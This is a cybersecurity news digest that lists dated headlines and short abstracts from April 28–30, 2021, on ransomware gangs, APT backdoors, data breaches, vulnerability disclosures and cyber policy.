April, 2021
April 30, 2021 – Ransomware
The Week in Ransomware - April 30th 2021 - Attacks Escalate Full Text
Abstract
Ransomware gangs continue to target organizations large and small, including a brazen attack on the Washington DC police department.BleepingComputer
April 30, 2021 – Malware
Purple Lambert, a new malware of CIA-linked Lambert APT group Full Text
Abstract
Experts from Kaspersky explained that in February 2019, multiple antivirus companies received a collection of malware samples, some of them cannot be associated with the activity of known APT groups.Security Affairs
April 30, 2021 – General
Hillicon Valley: DOJ to review cyber challenges | Gaetz, House Republicans want to end funding for postal service surveillance | TikTok gets new CEO Full Text
Abstract
Social media giant TikTok gained a new CEO on Friday with ties to parent company ByteDance. Meanwhile, a top Justice Department official said the agency would soon undertake a cybersecurity review to improve its response to cyber threats, and the European Commission clapped back at Apple for allegedly abusing its dominant position on its App Store for music streaming apps.The Hill
April 30, 2021 – Breach
British Prime Minister’s Cell Phone Number Exposed Full Text
Abstract
Boris Johnson’s personal cell phone number reportedly available online since 2006Infosecurity Magazine
April 30, 2021 – Government
House Armed Services Holds Hearing on Technology and Information Warfare Full Text
Abstract
On Friday, April 30, 2021, at 3:00 p.m., the House Armed Services Subcommittee on Cyber, Innovative Technologies and Information Systems will hold a hearing titled, "Technology and Information Warfare: The Competition for Influence and the Department of Defense." The subcommittee will hear testimony from Nina Jankowicz, a fellow at the Wilson Center; Glenn Gerstell, the former general counsel for the National Security Agency; Herb Lin, a senior research scholar at Stanford University; and Joseph Kirschbaum, the director of the defense capabilities management team at the Government AccountabLawfare
April 30, 2021 – APT
China-linked APT uses a new backdoor in attacks at Russian defense contractor Full Text
Abstract
China-linked APT group targets Russian nuclear sub designer with an undocumented backdoor A China-linked cyberespionage group targets a Russian defense contractor involved in designing nuclear submarines for the Russian Navy. Cybereason researchers...Security Affairs
April 30, 2021 – Malware
Researchers sound the alarm after GitHub floats stricter policies Full Text
Abstract
GitHub on Thursday solicited the comments of the security research community on its new, apparently stricter policies for posting malware and proof-of-concept exploits.SCMagazine
April 30, 2021 – Malware
PortDoor Espionage Malware Takes Aim at Russian Defense Sector Full Text
Abstract
The stealthy backdoor is likely being used by Chinese APTs, researchers said.Threatpost
April 30, 2021 – Breach
First Horizon bank online accounts hacked to steal customers’ funds Full Text
Abstract
Bank holding company First Horizon Corporation disclosed the some of its customers had their online banking accounts breached by unknown attackers earlier this month.BleepingComputer
April 30, 2021 – Policy and Law
Gaetz, House Republicans introduce bill to defund Postal Service covert operations program Full Text
Abstract
Rep. Matt Gaetz (R-Fla.) and a group of other House Republicans on Friday introduced legislation to end funding for an arm of the U.S. Postal Service that carries out online surveillance.The Hill
April 30, 2021 – Criminals
UNC2447 cybercrime gang exploited SonicWall Zero-Day before it was fixed Full Text
Abstract
UNC2447 cybercrime gang exploited a zero-day in the Secure Mobile Access (SMA), addressed by SonicWall earlier this year, before the vendor released a fix. Researchers from FireEye’s Mandiant revealed that a sophisticated cybercrime gang tracked...Security Affairs
April 30, 2021 – Education
Cyber.org pilot program aims to steer minority students toward HBCU cyber degrees Full Text
Abstract
Said T. Lamar Goree, superintendent of Caddo Parish Public Schools, of the program: “This is going to help us change the trajectory of black and brown children, and underserved children, from a socioeconomic perspective.”SCMagazine
April 30, 2021 – Ransomware
Babuk quits ransomware encryption, focuses on data-theft extortion Full Text
Abstract
A new message today from the operators of Babuk ransomware clarifies that the gang has decided to close the affiliate program and move to an extortion model that does not rely on encrypting victim computers.BleepingComputer
April 30, 2021 – Government
Justice Department to undertake 120 day review of cybersecurity challenges Full Text
Abstract
The Justice Department will soon begin a 120 day review of cybersecurity challenges in the midst of escalating cyber threats.The Hill
April 30, 2021 – Vulnerabilities
Microsoft warns of damaging vulnerabilities in dozens of IoT operating systems Full Text
Abstract
The flaws affect at least 25 different products made by more than a dozen organizations, including Amazon, ARM, Google Cloud, Samsung, RedHat, Apache and others.SCMagazine
April 30, 2021 – Malware
Fake Replica Sites of 900 Global News Outlets Target Users with Malware and Scam Advertisements Full Text
Abstract
In perhaps one of the biggest phishing incidents targeting some of the world’s largest news organizations, hackers have created fake replica websites of news portals of 900 global news portals.The Times Of India
April 30, 2021 – Outage
Hotbit cryptocurrency exchange down after hackers targeted wallets Full Text
Abstract
Cryptocurrency trading platform Hotbit has shut down all services for at least a week after a cyberattack that down several of its services on Thursday evening.BleepingComputer
April 30, 2021 – Phishing
Your stolen ParkMobile data is now free for wannabe scammers Full Text
Abstract
The account information for almost 22 million ParkMobile customers is now in the hands of hackers and scammers after the data was released for free on a hacking forum.BleepingComputer
April 30, 2021 – Policy and Law
Software Company Self-Reports Illegal Exports Full Text
Abstract
SAP fined $8m after admitting it exported US-made patches and upgrades to Iran for seven yearsInfosecurity Magazine
April 30, 2021 – Ransomware
An alleged ransomware attack hit the Italian Banca di Credito Cooperativo causing chaos Full Text
Abstract
Banca di Credito Cooperativo (BCC), one of the largest Italian cooperative credit banks, was hit by a cyberattack allegedly carried out by one of the most aggressive ransomware gangs, Darkside.Security Affairs
April 30, 2021 – General
INSA Forms Critical Infrastructure Subcommittee Full Text
Abstract
Privately owned critical infrastructure to benefit from new cybersecurity delegationInfosecurity Magazine
April 30, 2021 – Criminals
Hacking group that targeted D.C. police briefly posts internal police files Full Text
Abstract
The documents posted Wednesday ran into the hundreds of pages and included names, Social Security numbers, phone numbers, financial and housing records, job histories, and polygraph assessments.Washington Post
April 30, 2021 – Hacker
Suspected Chinese state hackers target Russian submarine designer Full Text
Abstract
Hackers suspected to work for the Chinese government have used a new malware called PortDoor to infiltrate the systems of an engineering company that designs submarines for the Russian Navy.BleepingComputer
April 30, 2021 – Government
New SEI CERT chief and first ever federal CISO: old cybersecurity models have ‘been overcome’ Full Text
Abstract
SC Media caught up with Greg Touhill this week to learn what issues and projects he plans to prioritize in his role and how the old cybersecurity models we’ve relied on no longer work. In his words, “we need to change our game plan, because the traditional cybersecurity tactics, techniques and procedures that we’ve used for many years are no longer working the way we need them to be.”SCMagazine
April 30, 2021 – Phishing
Saving World Health Day: UNICC and Group-IB take down scam campaign impersonating the World Health Organization Full Text
Abstract
UNICC and Group-IB detected and took down a massive multistage scam campaign circulating online on April 7, World Health Day. Group-IB, a global threat hunting and adversary-centric cyber intelligence company that specializes in investigating hi-tech...Security Affairs
April 30, 2021 – Policy and Law
US prosecutors fine German software company for violating sanctions against Iran Full Text
Abstract
Federal prosecutors have imposed a fine on a German software company for violating suctions against Iran.The Hill
April 30, 2021 – Policy and Law
Senators introduce bill to increase US technology competitiveness against China Full Text
Abstract
Sens. Catherine Cortez Masto (D-Nev.) and Rob PortmanRobert (Rob) Jones PortmanThe Hill's Morning Report - Biden to country: 'Turning peril into possibility' Moderate Republicans leery of Biden's renewed call for unity Biden makes case for sweeping change MORE (R-Ohio) on Friday introduced a bill to improve U.S. competitiveness against China and other nations by strengthening the nation’s ability to set standards around emerging technologies.The Hill
April 30, 2021 – General
Middle market companies facing a record number of data breaches Full Text
Abstract
Middle market companies possess a lot of valuable data but continue to lack appropriate levels of protective controls and staffing, according to a report from RSM US and the U.S. Chamber of Commerce.Help Net Security
April 30, 2021 – Vulnerabilities
ISC Urges Organizations to Update DNS Servers to Wipe Out New BIND Vulnerabilities Full Text
Abstract
This week, the organization said the vulnerabilities impact ISC Berkeley Internet Name Domain (BIND) 9, widely used as a DNS system and maintained as an open-source project.ZDNet
April 30, 2021 – Ransomware
Hackers Exploit SonicWall Zero-Day Bug in FiveHands Ransomware Attacks Full Text
Abstract
An "aggressive" financially motivated threat group tapped into a zero-day flaw in SonicWall VPN appliances prior to it being patched by the company to deploy a new strain of ransomware called FIVEHANDS. The group, tracked by cybersecurity firm Mandiant as UNC2447, took advantage of an "improper SQL command neutralization" flaw in the SSL-VPN SMA100 product ( CVE-2021-20016 , CVSS score 9 .8) that allows an unauthenticated attacker to achieve remote code execution. "UNC2447 monetizes intrusions by extorting their victims first with FIVEHANDS ransomware followed by aggressively applying pressure through threats of media attention and offering victim data for sale on hacker forums," Mandiant researchers said . "UNC2447 has been observed targeting organizations in Europe and North America and has consistently displayed advanced capabilities to evade detection and minimize post-intrusion forensics." CVE-2021-20016 is the same zero-day that theThe Hacker News
April 30, 2021 – Breach
Contact-tracing apps: Android phones were leaking sensitive data, find researchers Full Text
Abstract
Hundreds of third-party apps in Android devices were given access to sensitive data logged by contact-tracing apps built on Google and Apple's API, according to security researchers.ZDNet
April 30, 2021 – Government
Five US Federal Government Agencies Potentially Breached in Pulse Connect Secure VPN Attacks Full Text
Abstract
Hackers with suspected ties to China repeatedly took advantage of vulnerabilities in Pulse Secure VPN, a widely used remote connectivity tool, to gain access to government agencies and defense firms.CNN Money
April 30, 2021 – Vulnerabilities
Microsoft Warns 25 Critical Vulnerabilities in IoT, Industrial Devices Full Text
Abstract
Azure Defender security team discovers that memory allocation is a systemic problem that can allow threat actors to execute malicious code remotely or cause entire systems to crash.Threatpost
April 30, 2021 – Vulnerabilities
Microsoft warns of BadAlloc flaws in OT, IoT devices Full Text
Abstract
Microsoft researchers are warning of major security vulnerabilities affecting OT and IoT devices and high-risks for businesses using them. Researchers from Microsoft’s Section 52 team recently uncovered several critical memory allocation flaws,...Security Affairs
April 30, 2021 – Breach
Paleo Lifestyle Brand Exposes Customers to Fraud in Massive Data Breach Full Text
Abstract
The data breach originated from an unsecured cloud storage account Paleohacks was using to store the private data and personal details of over 70,000 customers and users.VPN Mentor
April 30, 2021 – Government
U.S. government probes VPN hack within federal agencies, races to find clues Full Text
Abstract
The new government breaches involve a popular virtual private network (VPN) known as Pulse Connect Secure, which hackers were able to break into using some known security flaws.Reuters
April 30, 2021 – Vulnerabilities
Command injection flaw in PHP Composer allowed supply-chain attacks Full Text
Abstract
The command injection vulnerability was discovered by researchers from SonarSource who warn that it flaw could have been potentially exploited to conduct a supply-chain attack.Security Affairs
April 30, 2021 – Ransomware
Ransomware Task Force Urges Tighter Crypto Regulation Full Text
Abstract
Long-awaited document calls for closer international co-operationInfosecurity Magazine
April 30, 2021 – Breach
Paleo Lifestyle Site Found Leaking PII on 70,000 Users Full Text
Abstract
Paleohacks misconfigured an AWS S3 bucketInfosecurity Magazine
April 30, 2021 – Government
Biden takes quick action on cyber in first 100 days Full Text
Abstract
President Biden and his administration hit the ground running on securing federal networks and critical infrastructure during his first 100 days in office, taking quick action after years of what some officials viewed as national security setbacks in U.S. cyber policy.The Hill
April 30, 2021 – Vulnerabilities
Microsoft Finds ‘BadAlloc’ Flaws Affecting Wide-Range of IoT and OT Devices Full Text
Abstract
Microsoft researchers on Thursday disclosed two dozen vulnerabilities affecting a wide range of Internet of Things (IoT) and Operational Technology (OT) devices used in industrial, medical, and enterprise networks that could be abused by adversaries to execute arbitrary code and even cause critical systems to crash. "These remote code execution (RCE) vulnerabilities cover more than 25 CVEs and potentially affect a wide range of domains, from consumer and medical IoT to Industrial IoT, Operational Technology, and industrial control systems," said Microsoft's 'Section 52' Azure Defender for IoT research group. The flaws have been collectively named " BadAlloc ," for they are rooted in standard memory allocation functions spanning widely used real-time operating systems (RTOS), embedded software development kits (SDKs), and C standard library (libc) implementations. A lack of proper input validations associated with these memory allocation functionsThe Hacker News
April 30, 2021 – Accident
Codecov starts notifying customers affected by supply-chain attack Full Text
Abstract
Codecov has now started notifying the maintainers of software repositories affected by the recent supply-chain attack. These notifications, delivered via both email and the Codecov application interface, state that the company believes the affected repositories were downloaded by threat actors.BleepingComputer
April 30, 2021 – Government
Cyberspace Solarium Commission: CISA Funding Should Increase by at Least $400M Full Text
Abstract
In a letter to the House Committee on Appropriations, two members of the Cyberspace Solarium Commission are asking for an increase in funding for the CISA in the fiscal year 2022.Security Week
April 30, 2021 – General
Here’s A New Forum for Cybersecurity Leaders Outside of the Fortune 2000 Full Text
Abstract
Perhaps due to the nature of the position, the InfoSec leadership roles tend to be solitary ones. CISOs, or their equivalent decision-makers in organizations without the role, have so many constant drains on their attention – keeping their knowledge fresh, building plans to secure their organizations further – that they often find themselves on an island. It's even more challenging for organizations outside the Fortune 2000 that are resource-constrained. Security leaders are expected to know everything and often don't have anyone inside their organization with whom to bounce ideas or even go to for advice. When a crisis arises, they must often go with their gut or guess at the best solution based on their own experiences. Security leaders could often use advice but don't have an outlet for it. Chris Roberts, Chief Security Strategist at Cynet Security, offers a new Slack-based community for InfoSec leaders ( register here ) as a solution. The new InfoSec Leaders Community will feaThe Hacker News
April 30, 2021 – Ransomware
DC Officer Info Leaked Online by Ransomware Group: Report Full Text
Abstract
Babuk says this is its last big job before closing downInfosecurity Magazine
April 30, 2021 – Breach
Financial services firm First Horizon suffers data breach with customer funds stolen Full Text
Abstract
Disclosed in a filing with the SEC, the breach is described as involving an authorized third party obtaining login credentials from an unknown source and then attempting to access customer accounts.Silicon Angle
April 30, 2021 – Phishing
Passwordstate Warns of Ongoing Phishing Attacks Following Data Breach Full Text
Abstract
Click Studios, the Australian software firm which confirmed a supply chain attack affecting its Passwordstate password management application, has warned customers of an ongoing phishing attack by an unknown threat actor. "We have been advised a bad actor has commenced a phishing attack with a small number of customers having received emails requesting urgent action," the company said in an updated advisory released on Wednesday. "These emails are not sent by Click Studios." Last week, Click Studios said attackers had employed sophisticated techniques to compromise Passwordstate's update mechanism, using it to drop malware on user computers. Only customers who performed In-Place Upgrades between April 20, 8:33 PM UTC, and April 22, 0:30 AM UTC are said to be affected. While Passwordstate serves about 29,000 customers, the Adelaide-based firm maintained that the total number of impacted customers is very low. It's also urging users to refrain from poThe Hacker News
April 30, 2021 – Ransomware
Darkside Ransomware Returns with a Vengeance Full Text
Abstract
In March, threat intelligence experts warned of a new version of the ransomware that featured a faster encryption process, VoIP calling, and modules to target virtual machines.Cyware Alerts - Hacker News
April 29, 2021 – Government
Programs within military intel agencies in the US and UK show growing commitment to neurodiversity Full Text
Abstract
Efforts underway in both the DoD’s geospatial intelligence agency and the U.K.’s signals intel and information assurance organization show neurodivergent men and women with an interest in cybersecurity are finding new opportunities to bring their unique ways of thinking to the government workforce.SCMagazine
April 29, 2021 – Ransomware
Brazil’s Rio Grande do Sul court system hit by REvil ransomware Full Text
Abstract
Brazil's Tribunal de Justiça do Estado do Rio Grande do Sul was hit with an REvil ransomware attack yesterday that encrypted employee's files and forced the courts to shut down their network.BleepingComputer
April 29, 2021 – Ransomware
Babuk Ransomware Gang Mulls Retirement Full Text
Abstract
The RaaS operators have been posting, tweaking and taking down a goodbye note, saying that they’ll be open-sourcing their data encryption malware for other crooks to use.Threatpost
April 29, 2021 – Ransomware
QNAP warns of AgeLocker ransomware attacks on NAS devices Full Text
Abstract
QNAP customers are once again urged to secure their Network Attached Storage (NAS) devices to defend against Agelocker ransomware attacks targeting their data.BleepingComputer
April 29, 2021 – Vulnerabilities
Microsoft finds critical code execution bugs in IoT, OT devices Full Text
Abstract
Microsoft security researchers have discovered over two dozen critical remote code execution (RCE) vulnerabilities in Internet of Things (IoT) devices and Operational Technology (OT) industrial systems.BleepingComputer
April 29, 2021 – General
Hillicon Valley: Coalition unveils plan to help government, industry confront ransomware attacks | Labor secretary backs employee status for some gig workers | Joe Rogan clarifies vaccine comments: ‘I’m not an anti-vax person’ Full Text
Abstract
Experts unveiled a plan Thursday to combat ransomware attacks, amid a spike this year targeting hospitals and schools. Labor Secretary Marty WalshMarty WalshOSHA sends draft emergency temporary standard for COVID-19 to OMB review Koch groups call on administration to release all temporary worker visas Biden's policies are already hurting workers — and there's more hurt coming MORE weighed in on the debate over the classification of gig workers, and popular Spotify podcast host Joe Rogan clarified his controversial comments that young, healthy people don't need a COVID-19 vaccine.The Hill
April 29, 2021 – Ransomware
Ransomware group targeted SonicWall vulnerability pre-patch Full Text
Abstract
A ransomware group caught targeting a recently patched SonicWall vulnerability leveraged that vulnerability before the patch became available, Mandiant reported Thursday.SCMagazine
April 29, 2021 – Ransomware
New ransomware group uses SonicWall zero-day to breach networks Full Text
Abstract
A financially motivated threat actor exploited a zero-day bug in Sonicwall SMA 100 Series VPN appliances to deploy new ransomware known as FiveHands on the networks of North American and European targets.BleepingComputer
April 29, 2021 – Vulnerabilities
Command injection flaw in PHP Composer allowed supply-chain attacks Full Text
Abstract
A vulnerability in the PHP Composer could have allowed an attacker to execute arbitrary commands and backdoor every PHP package. The maintainers of the PHP Composer package have addressed a critical vulnerability, tracked as CVE-2021-29472, that could...Security Affairs
April 29, 2021 – Ransomware
Ransomware gang Babuk claims DC’s Metropolitan Police was last caper – then goes dark Full Text
Abstract
The move was a surprising one after infiltrating such a high-value target, leaving some security experts skeptical that the group won’t reemerge anew.SCMagazine
April 29, 2021 – Vulnerabilities
F5 Big-IP Vulnerable to Security-Bypass Bug Full Text
Abstract
The KDC-spoofing flaw tracked as CVE-2021-23008 can be used to bypass Kerberos security and sign into the Big-IP Access Policy Manager or admin console.Threatpost
April 29, 2021 – Covid-19
Anti-Vaxxer Hijacks QR Codes at COVID-19 Check-In Sites Full Text
Abstract
The perp faces jail time, but the incident highlights the growing cyber-abuse of QR codes.Threatpost
April 29, 2021 – Breach
DoppelPaymer Gang Leaks Files from Illinois AG After Ransom Negotiations Break Down Full Text
Abstract
Information stolen in April 10 ransomware attack was posted on a dark web portal and includes private documents not published as part of public records.Threatpost
April 29, 2021 – Breach
Experian API Leaks Most Americans’ Credit Scores Full Text
Abstract
Researchers fear wider exposure, amidst a tepid response from Experian.Threatpost
April 29, 2021 – Ransomware
QNAP finds evidence of AgeLocker ransomware activity in the wild Full Text
Abstract
QNAP customers are once again urged to secure their Network Attached Storage (NAS) devices following a massive Qlocker ransomware campaign earlier this month.BleepingComputer
April 29, 2021 – Criminals
With Recent Law Enforcement Actions, Emotet’s Days are Now Over Full Text
Abstract
Europol claimed to wipe Emotet infection from hundreds of servers globally. The FBI, meanwhile, handed over 4.3 million email addresses to the Have I Been Pwned site to help mitigate infections.Cyware Alerts - Hacker News
April 29, 2021 – Ransomware
An alleged ransomware attack hit the Italian Banca di Credito Cooperativo causing chaos Full Text
Abstract
Banca di Credito Cooperativo (BCC), one of the largest Italian cooperative credit banks was hit by a ransomware attack. Banca di Credito Cooperativo (BCC), one of the largest Italian cooperative credit banks, was hit by a cyberattack allegedly...Security Affairs
April 29, 2021 – Hacker
Russian Hackers Actively Targeting the U.S. and Other Organizations Full Text
Abstract
The FBI, the DHS, and the CISA warned of coordinated attacks, in a joint alert, by the Russian Foreign Intelligence Service, aka APT29, against U.S. and foreign organizations.Cyware Alerts - Hacker News
April 29, 2021 – Ransomware
Babuk ransomware readies ‘shut down’ post, plans to open source malware Full Text
Abstract
After just a few months of activity, the operators of Babuk ransomware briefly posted a short message about their intention to quit the extortion business after having achieved their goal.BleepingComputer
April 29, 2021 – Privacy
Flubot Spyware is Employing Smishing Attacks Full Text
Abstract
Hackers are targeting Android phone users across the U.K via malicious text messages to steal banking information and credentials, and even lift passwords from devices.Cyware Alerts - Hacker News
April 29, 2021 – Malware
ToxicEye RAT is Exploiting Telegram Platform Full Text
Abstract
Private messaging app Telegram is being exploited by cyberattackers who are delivering a ToxicEye RAT to take control over a hacker-operated Telegram account and leak critical data.Cyware Alerts - Hacker News
April 29, 2021 – Government
White House Asked to Increase Crypto Regulation Full Text
Abstract
Task force urges Biden to tackle ransomware attacks, disrupt cyber-criminals' safe havens, and regulate crypto more tightlyInfosecurity Magazine
April 29, 2021 – Ransomware
Multi-Gov Task Force Plans to Take Down the Ransomware Economy Full Text
Abstract
A coalition of 60 global entities (including the DoJ) has proposed a sweeping plan to hunt down and disrupt ransomware gangs by going after their financial operations.Threatpost
April 29, 2021 – Vulnerabilities
Several High-Severity Vulnerabilities Expose Cisco Firewalls to Remote Attacks Full Text
Abstract
Tracked as CVE-2021-1448 and having a CVSS score of 7.8, the command injection bug is mitigated by the fact that authentication and local access are required for successful exploitation.Security Week
April 29, 2021 – Business
Accenture to Acquire Openminded Full Text
Abstract
Accenture enters into agreement to acquire French cybersecurity services companyInfosecurity Magazine
April 29, 2021 – Policy and Law
Boston Nanny Arrested After Cyber-Tip Full Text
Abstract
Police trace shared child sexual abuse material back to well-established nanny and babysitterInfosecurity Magazine
April 29, 2021 – Breach
Experian API Exposed Credit Scores of Most Americans – Krebs on Security Full Text
Abstract
Experian fixed a weakness with a partner website that let anyone look up the credit score of tens of millions of Americans just by supplying their name and mailing address, KrebsOnSecurity reported.Krebs on Security
April 29, 2021 – Government
Northern Ireland Government Announces Partnership to Offer Cyber Career Opportunities Full Text
Abstract
Participants will be trained via Immersive Labs online platformInfosecurity Magazine
April 29, 2021 – Vulnerabilities
An issue in the Linux Kernel could allow the hack of your system Full Text
Abstract
An information disclosure issue in Linux Kernel allows KASLR bypass could be potentially exploited in attacks in the wild. An information disclosure flaw in the Linux kernel, tracked as CVE-2020-28588, could allow attackers to bypass the Kernel Address...Security Affairs
April 29, 2021 – Covid-19
COVID-19 Results for 25% of Wyoming Accidentally Posted Online Full Text
Abstract
Sorry, we’ve upchucked your COVID test results and other medical and personal data into public GitHub storage buckets, the Wyoming Department of Health said.Threatpost
April 29, 2021 – Ransomware
Whistler resort municipality hit by new ransomware operation Full Text
Abstract
The Whistler municipality in British Columbia, Canada, has suffered a cyberattack at the hands of a new ransomware operation.BleepingComputer
April 29, 2021 – Business
Accenture acquires French cybersecurity firm Openminded Full Text
Abstract
Openminded provides cybersecurity services including management, consultancy, and cloud & infrastructure solutions with a focus on risk analysis, remediation, and regulatory compliance.ZDNet
April 29, 2021 – Government
Iran updates budget to allocate $71.4 million to ‘cyberspace’ operations Full Text
Abstract
The Tehran government has updated its national budget to allocate an extra $71.4 million for the cyberspace programs of two government-controlled organizations, IRIB and IDO.The Record
April 29, 2021 – Ransomware
Security expert coalition shares actions to disrupt ransomware Full Text
Abstract
The Ransomware Task Force, a public-party coalition of more than 50 experts, has shared a framework of actions to disrupt the ransomware business model.BleepingComputer
April 29, 2021 – Deepfake
Deepfakes Are Getting Closer to Reality Full Text
Abstract
Several positive steps continue to be taken by organizations such as the European Union and the U.S. FTC to curb possible malicious uses and abuses of AI via new regulations.Trend Micro
April 29, 2021 – Government
Biden prepping cybersecurity executive order in response to SolarWinds attack Full Text
Abstract
President Biden is preparing a cybersecurity executive order focused on helping the country protect itself from future cyberattacks following the sophisticated SolarWinds hack that was discovered in December.The Hill
April 29, 2021 – Vulnerabilities
A New PHP Composer Bug Could Enable Widespread Supply-Chain Attacks Full Text
Abstract
The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource , following which a hotfix was deployed less than 12 hours later. "Fixed command injection vulnerability in HgDriver/HgDownloader and hardened other VCS drivers and downloaders," Composer said its release notes for versions 2.0.13 and 1.10.22 published on Wednesday. "To the best of our knowledge the vulnerability has not been exploited." Composer is billed as a tool for dependency management in PHP, enabling easy installation of packages relevant to a project. It also allows users to install PHP applications that are available on Packagist , a repository that aggregates all public PThe Hacker News
April 29, 2021 – Criminals
Emotet Group Harvested Over 4.3 Million Victim Emails Full Text
Abstract
Concerned users can now check with HaveIBeenPwnedInfosecurity Magazine
April 29, 2021 – General
Data Brokers and National Security Full Text
Abstract
Policymakers have paid scant consideration to the national security implications of unfettered, largely unregulated data brokering. That may be changing.Lawfare
April 29, 2021 – Malware
Purple Lambert, a new malware of CIA-linked Lambert APT group Full Text
Abstract
Cybersecurity firm Kaspersky discovered a new strain of malware that is believed to be part of the arsenal of theUS Central Intelligence Agency (CIA). Cybersecurity firm Kaspersky has discovered a new malware that experts attribute to the US Central...Security Affairs
April 29, 2021 – Ransomware
Ransomware Task Force releases long-awaited recommendations Full Text
Abstract
More than 60 stakeholders contributed to a ransomware framework released Thursday morning, which advocates for nearly 50 interlocking government and private sector strategies to tackle the criminal scourge.SCMagazine
April 29, 2021 – Attack
SaaS Attacks: Lessons from Real-Life Misconfiguration Exploits Full Text
Abstract
There is a way to protect users from deceptive OAuth apps, misconfigurations and misappropriated user permissions. SaaS Security Posture Management (SSPM) takes an automated approach to tracking, and even remediating, the exploitable misconfigurations in organizations’ SaaS apps.Threatpost
April 29, 2021 – Criminals
The Sodinokibi Chronicles: A (R)Evil Cybercrime Gang Disrupting Organizations for Trade Secrets and Cash Full Text
Abstract
Once Sodinokibi focuses on a potential victim, the attack goes into a more sophisticated operation by human actors who pave their way through the compromised networks to find data and exfiltrate it.Security Intelligence
April 29, 2021 – Ransomware
Coalition unveils plan to help government, industry confront ransomware attacks Full Text
Abstract
A coalition of experts on Thursday unveiled a road map for the federal government and industry to potentially use in combating ransomware attacks, which have spiked over the past year as hackers targeted organizations including hospitals and schools.The Hill
April 29, 2021 – Hacker
LuckyMouse Hackers Target Banks, Companies and Governments in 2020 Full Text
Abstract
An adversary known for its watering hole attacks against government entities has been linked to a slew of newly detected intrusions targeting various organizations in Central Asia and the Middle East. The malicious activity, collectively named "EmissarySoldier," has been attributed to a threat actor called LuckyMouse, and is said to have happened in 2020 with the goal of obtaining geopolitical insights in the region. The attacks involved deploying a toolkit dubbed SysUpdate (aka Soldier) in a number of breached organizations, including government and diplomatic agencies, telecom providers, a TV media company, and a commercial bank. LuckyMouse , also referred to as APT27 and Emissary Panda, is a sophisticated cyberespionage group that has a history of breaching multiple government networks in Central Asia and the Middle East. The actor has also been linked to cyberattacks aimed at transnational organizations such as the International Civil Aviation Organization ( ICAO )The Hacker News
April 29, 2021 – Accident
Cancer Patients Diverted After Cyber-Attack on MedTech Firm Full Text
Abstract
Supply chain attack caused disruption across the countryInfosecurity Magazine
April 29, 2021 – Vulnerabilities
RotaJakiro Linux backdoor has flown under the radar since 2018 Full Text
Abstract
Experts recently uncovered a Linux backdoor, dubbed RotaJakiro, that has flown under the radar for many years while harvest and exfiltrate sensitive information from the victims. RotaJakiro is a Linux backdoor recently discovered by researchers...Security Affairs
April 29, 2021 – Business
Threat Detection Firm Vectra Raises $130 Million at $1.2 Billion Valuation Full Text
Abstract
Threat detection and response solutions provider Vectra AI on Thursday announced that it has raised $130 million at a valuation of $1.2 billion, making the company the latest cybersecurity unicorn.Security Week
April 29, 2021 – Vulnerabilities
How to Conduct Vulnerability Assessments: An Essential Guide for 2021 Full Text
Abstract
Hackers are scanning the internet for weaknesses all the time, and if you don't want your organization to fall victim, you need to be the first to find these weak spots. In other words, you have to adopt a proactive approach to managing your vulnerabilities, and a crucial first step in achieving this is performing a vulnerability assessment. Read this guide to learn how to perform vulnerability assessments in your organization and stay ahead of the hackers. Vulnerability assessment tools Vulnerability assessments are automated processes performed by scanners. This makes them accessible to a wide audience. Many of the scanners are geared towards cybersecurity experts, but there are solutions tailored for IT managers and developers in organizations without dedicated security teams. Vulnerability scanners come in various types: some excel at network scanning, others at web applications, IoT devices, or container security. If you're a small business, you're likely to findThe Hacker News
April 29, 2021 – Breach
First Horizon Bank Customers Have Account Funds Drained Full Text
Abstract
Attackers stole less than $1 million after breaching internal securityInfosecurity Magazine
April 29, 2021 – Phishing
Lloyds Bank warning as Britons attacked by another text message scam Full Text
Abstract
The criminals are preying on Britons’ worries about their financial information being compromised, and money stolen. However, ironically, this is exactly what the fraudsters hope to accomplish.Express
April 29, 2021 – Government
Chinese Hackers Attacking Military Organizations With New Backdoor Full Text
Abstract
Bad actors with suspected ties to China have been behind a wide-ranging cyberespionage campaign targeting military organizations in Southeast Asia for nearly two years, according to new research. Attributing the attacks to a threat actor dubbed " Naikon APT ," cybersecurity firm Bitdefender laid out the ever-changing tactics, techniques, and procedures adopted by the group, including weaving new backdoors named "Nebulae" and "RainyDay" into their data-stealing missions. The malicious activity is said to have been conducted between June 2019 and March 2021. "In the beginning of the operation the threat actors used Aria-Body loader and Nebulae as the first stage of the attack," the researchers said . "Starting with September 2020, the threat actors included the RainyDay backdoor in their toolkit. The purpose of this operation was cyberespionage and data theft." Naikon (aka Override Panda, Lotus Panda, or Hellsing) has a track recorThe Hacker News
April 29, 2021 – Ransomware
DoppelPaymer Ransomware Gang Releases Court and Prisoner Files Stolen from Illinois Attorney General Office Full Text
Abstract
The files were published on a dark web portal managed by the DopplePaymer ransomware gang and also include personally identifiable information about state prisoners, their grievances, and cases.The Record
April 29, 2021 – Malware
Researchers Uncover Stealthy Linux Malware That Went Undetected for 3 Years Full Text
Abstract
A previously undocumented Linux malware with backdoor capabilities has managed to stay under the radar for about three years, allowing the threat actor behind the operation to harvest and exfiltrate sensitive information from infected systems. Dubbed " RotaJakiro " by researchers from Qihoo 360 NETLAB, the backdoor targets Linux X64 machines, and is so named after the fact that "the family uses rotate encryption and behaves differently for root/non-root accounts when executing." The findings come from an analysis of a malware sample it detected on March 25, although early versions appear to have been uploaded to VirusTotal as early as May 2018. A total of four samples have been found to date on the database, all of which remain undetected by most anti-malware engines. As of writing, only seven security vendors flag the latest version of the malware as malicious. "At the functional level, RotaJakiro first determines whether the user is root or non-The Hacker News
April 29, 2021 – Malware
Water Pamola Campaign Targeted E-Commerce Sites in Japan, Australia, and Europe via Malicious Orders Full Text
Abstract
Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators. These scripts were managed with an XSS attack framework called "XSS.ME."Trend Micro
April 29, 2021 – Phishing
Bitcoin scammers phish for wallet recovery codes on Twitter Full Text
Abstract
The scam isn’t being spread by just one account, nor is there just one bogus support form. Multiple Twitter profiles lurk in the replies of anyone having a bad cryptocoin experience.Malwarebytes Labs
April 29, 2021 – Malware
New Shameless WeSteal Commodity Cryptocurrency Stealer and WeControl Commodity RAT Full Text
Abstract
The author of WeSteal, a new commodity cryptocurrency stealer, makes no attempt to disguise the intent for his malware. The seller promises “the leading way to make money in 2021”.Palo Alto Networks
April 28, 2021 – Vulnerabilities
Google Chrome V8 Bug Allows Remote Code-Execution Full Text
Abstract
